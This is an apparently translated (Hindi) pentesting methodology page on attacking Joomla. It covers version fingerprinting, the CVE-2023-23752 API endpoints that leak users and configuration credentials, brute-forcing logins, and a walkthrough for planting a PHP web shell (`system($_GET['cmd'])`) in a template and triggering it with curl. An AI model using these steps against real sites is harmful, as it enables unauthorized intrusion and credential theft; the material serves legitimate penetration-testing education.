Joomla
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
मोबाइल सुरक्षा में अपनी विशेषज्ञता को 8kSec अकादमी के साथ गहरा करें। हमारे आत्म-गति पाठ्यक्रमों के माध्यम से iOS और Android सुरक्षा में महारत हासिल करें और प्रमाणित हों:
Joomla कुछ गुमनाम उपयोग सांख्यिकी एकत्र करता है जैसे Joomla, PHP और डेटाबेस संस्करणों का विभाजन और Joomla इंस्टॉलेशन पर उपयोग में आने वाले सर्वर ऑपरेटिंग सिस्टम। इस डेटा को उनके सार्वजनिक API के माध्यम से क्वेरी किया जा सकता है।
मेटा की जांच करें
robots.txt
README.txt
In /administrator/manifests/files/joomla.xml आप संस्करण देख सकते हैं।
In /language/en-GB/en-GB.xml आप Joomla का संस्करण प्राप्त कर सकते हैं।
In plugins/system/cache/cache.xml आप एक अनुमानित संस्करण देख सकते हैं।
In 80,443 - Pentesting Web Methodology एक अनुभाग है जो CMS स्कैनर्स के बारे में है जो Joomla को स्कैन कर सकते हैं।
संस्करण 4.0.0 से 4.2.7 अनधिकृत जानकारी के प्रकटीकरण (CVE-2023-23752) के प्रति संवेदनशील हैं जो क्रेड्स और अन्य जानकारी को डंप करेगा।
उपयोगकर्ता: http://<host>/api/v1/users?public=true
कॉन्फ़िग फ़ाइल: http://<host>/api/index.php/v1/config/application?public=true
MSF मॉड्यूल: scanner/http/joomla_api_improper_access_checks
या रूबी स्क्रिप्ट: 51334
आप इस स्क्रिप्ट का उपयोग लॉगिन को ब्रूट फोर्स करने के लिए कर सकते हैं।
यदि आप admin credentials प्राप्त करने में सफल हो गए हैं, तो आप RCE अंदर प्राप्त कर सकते हैं PHP कोड का एक स्निपेट जोड़कर RCE प्राप्त करने के लिए। हम इसे template को कस्टमाइज़ करके कर सकते हैं।
Templates
पर क्लिक करें जो Configuration
के तहत नीचे बाईं ओर है ताकि टेम्पलेट मेनू खुल सके।
एक template नाम पर क्लिक करें। आइए हम protostar
को Template
कॉलम हेडर के तहत चुनते हैं। यह हमें Templates: Customise
पृष्ठ पर ले जाएगा।
अंत में, आप एक पृष्ठ पर क्लिक कर सकते हैं ताकि पृष्ठ स्रोत खुल सके। आइए हम error.php
पृष्ठ को चुनते हैं। हम कोड निष्पादन प्राप्त करने के लिए एक PHP one-liner जोड़ेंगे जैसा कि निम्नलिखित है:
system($_GET['cmd']);
सहेजें और बंद करें
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Joomla शोषण स्क्रिप्ट जो XSS को RCE या अन्य महत्वपूर्ण कमजोरियों में बढ़ाती है। अधिक जानकारी के लिए इस पोस्ट की जांच करें। यह Joomla संस्करण 5.X.X, 4.X.X, और 3.X.X के लिए समर्थन प्रदान करता है, और अनुमति देता है:
Privilege Escalation: Joomla में एक उपयोगकर्ता बनाता है।
(RCE) Built-In Templates Edit: Joomla में एक Built-In Templates को संपादित करता है।
(Custom) Custom Exploits: तृतीय-पक्ष Joomla प्लगइन्स के लिए कस्टम शोषण।
Mobile Security में अपनी विशेषज्ञता को 8kSec Academy के साथ गहरा करें। हमारे आत्म-गति पाठ्यक्रमों के माध्यम से iOS और Android सुरक्षा में महारत हासिल करें और प्रमाणित हों:
AWS Hacking सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)